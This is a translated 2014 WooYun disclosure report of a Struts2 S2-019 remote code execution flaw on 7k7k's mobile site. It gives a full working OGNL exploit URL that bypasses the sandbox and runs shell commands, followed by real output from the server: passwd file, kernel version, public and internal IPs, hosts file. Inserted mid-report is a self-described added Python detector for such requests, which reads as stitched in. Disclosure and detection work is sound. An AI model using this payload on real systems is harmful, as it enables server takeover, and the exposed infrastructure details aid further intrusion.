Vulnerability details

Disclosure status:

2014-03-05: details reported to the vendor, awaiting vendor processing
2014-03-07: vendor has confirmed; details disclosed to the vendor only
2014-03-17: details disclosed to core white hats and experts in related fields
2014-03-27: details disclosed to regular white hats
2014-04-06: details disclosed to intern white hats
2014-04-19: details disclosed to the public

Brief description:

Detailed description:

#1. Seeing how quickly 奇客星空 (7k7k) confirms vulnerabilities, I thought I would dig up a few for them. Looking through 奇客星空's vulnerability history, I happened to come across WooYun: 奇客星空代码执行导致分站沦陷 (7k7k code execution leads to sub-site compromise). That report concerned a Struts2 framework vulnerability, completely different from the one I am submitting now, and the vendor replied: already fixed. To prove that the vendor has indeed fixed the Struts2 vulnerability, here is this screenshot:

URL: http://m.7k7k.com/about.html This is the mobile version of 奇客星空, I suppose (⊙_⊙)?

[Image: 01.jpg]

#2. Then I thought I would check whether debug mode was enabled and try the latest S2-019 vulnerability [in Apache Struts versions before 2.3.15.2 the "Dynamic Method Invocation" mechanism is enabled by default, and users are merely advised to disable it where possible; this leaves a remote code execution vulnerability that a remote attacker can exploit to execute arbitrary code in the context of the affected application]. So I tested it, and, tragically, it worked →_→

EXP:http://m.7k7k.com/about.html?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23resp=@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[1000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29
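The request above abuses two things at once: the Struts2 DebuggingInterceptor (its `debug=` parameter is only honoured while `struts.devMode` is true, so it should never be reachable in production) and an OGNL expression that flips `allowStaticMethodAccess` on the `#_memberAccess` sandbox before calling static methods. The following is an added defensive example, not code from the original report or from 7k7k: it scans web-server access logs in the common combined format and flags requests carrying Struts debug modes and these OGNL indicators, so an operator can tell probing (`debug=xml`) from an actual expression payload. The log lines are constructed for illustration, the client addresses are documentation-range IPs, and the encoded expression is a shortened stand-in for the kind of payload shown above; the function and variable names are my own.

```python
"""Flag Struts2 debug-mode / OGNL requests (S2-019 shape) in access logs.

Added example, not part of the original WooYun report. Sample log lines are
constructed; the request-line format is the common combined log format.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Modes accepted by the Struts2 DebuggingInterceptor. The interceptor only
# acts on them when struts.devMode is true, so seeing them in production
# traffic is itself a signal worth alerting on.
DEBUG_MODES = {"xml", "console", "command", "browser"}

# Lower-cased OGNL fragments that indicate sandbox bypass, static method
# access or process spawning (the fragments seen in the request above).
OGNL_INDICATORS = (
    "#_memberaccess",
    "allowstaticmethodaccess",
    "@org.apache.struts2.servletactioncontext@",
    "java.lang.processbuilder",
    "java.lang.runtime",
)

# Extracts method and target (path + query) from the quoted request line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_request(target):
    """Return a list of finding tags for one request target, or [] if clean."""
    findings = []
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    modes = [v.lower() for v in qs.get("debug", []) if v.lower() in DEBUG_MODES]
    if modes:
        findings.append("debug-interceptor:" + ",".join(modes))
    # parse_qs already decoded one layer of percent-encoding; unquote once
    # more so a double-encoded payload does not slip past the indicators.
    expr = unquote(" ".join(qs.get("expression", []))).lower()
    for indicator in OGNL_INDICATORS:
        if indicator in expr:
            findings.append("ognl-indicator:" + indicator)
    return findings


def severity(findings):
    """'high' when a debug mode and an OGNL indicator co-occur, else 'medium'."""
    has_debug = any(f.startswith("debug-interceptor:") for f in findings)
    has_ognl = any(f.startswith("ognl-indicator:") for f in findings)
    if has_debug and has_ognl:
        return "high"
    return "medium" if findings else "none"


def scan_log(lines):
    """Return one dict per suspicious line: line number, client, target, findings, severity."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = LOG_RE.search(line)
        if not match:
            continue  # not a parseable request line
        findings = classify_request(match.group("target"))
        if findings:
            hits.append({
                "line": number,
                "client": line.split()[0],
                "target": match.group("target"),
                "findings": findings,
                "severity": severity(findings),
            })
    return hits


# Constructed sample log (documentation-range client IPs, shortened payload).
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Mar/2014:10:01:02 +0800] "GET /about.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Mar/2014:10:01:09 +0800] "GET /search?q=debug+mode HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [05/Mar/2014:10:02:31 +0800] "GET /about.html?debug=xml HTTP/1.1" 200 3300 "-" "curl/7.19.7"',
    '198.51.100.7 - - [05/Mar/2014:10:02:44 +0800] "GET /about.html?debug=command&expression=%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29 HTTP/1.1" 200 45 "-" "curl/7.19.7"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'line {hit["line"]} {hit["severity"]:6} {hit["client"]} {hit["findings"]}')
```

The detection is deliberately keyed on parameter names and decoded OGNL fragments rather than on the full exploit string, so variations in the command being run still match. On the remediation side, the S2-019 advisory linked at the end of this report asks for Dynamic Method Invocation to be disabled (`struts.enable.DynamicMethodInvocation` set to `false`), and `struts.devMode` must be `false` in production so the DebuggingInterceptor never processes `debug=` at all.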


[Image: 02.jpg]

Still root privileges =_=|

[Image: 03.jpg]

Proof of vulnerability:

#3.
cat /etc/passwd/

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/

uname -a
Linux Ct-gc-bj136 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux null

ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:16:3E:13:E2:A4
inet addr:115.182.59.136 Bcast:115.182.59.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:19472163956 errors:0 dropped:0 overruns:0 frame:0
TX packets:182413747 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1324808432359 (1.2 TiB) TX bytes:80369708814 (74.8 GiB)

eth1 Link encap:Ethernet HWaddr 00:16:3E:34:0A:4D
inet addr:192.168.11.136 Bcast:192.168.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1446599118 errors:0 dropped:0 overruns:0 frame:0
TX packets:1016118809 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:490211357961 (456.5 GiB) TX bytes:473975578474 (441.4 GiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0

cat /etc/hosts

127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6

115.182.59.176 so.7k7k.com
192.168.11.108 Ct-bj108
192.168.11.31 Ct-bj31
192.168.11.136 Ct-gc-bj136
127.0.0.1 top.7k7k.com
192.168.11.149 api.cms.7k7k.com

115.182.59.250 s.7k7k.com
115.182.59.251 s.7k7k.com
115.182.59.252 s.7k7k.com

Remediation:

PS: for vulnerability details see http://struts.apache.org/release/2.3.x/docs/s2-019.html. With command execution in hand, is a webshell ever far off? Demonstrating the severity of the vulnerability is enough. I hope the vendor gives a high rank, and a gift please =_=. This is our first collaboration; I will find you a few more vulnerabilities later on.

Copyright notice: when republishing, please credit the source: U神@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed at: 2014-03-07 23:50

Vendor reply:

Thanks to the white-hat author for the report. The vulnerability is confirmed and has been fixed. We will contact the author afterwards to send a small gift, and we hope to cooperate with white-hat researchers.

Latest status:

None yet


Vulnerability rating: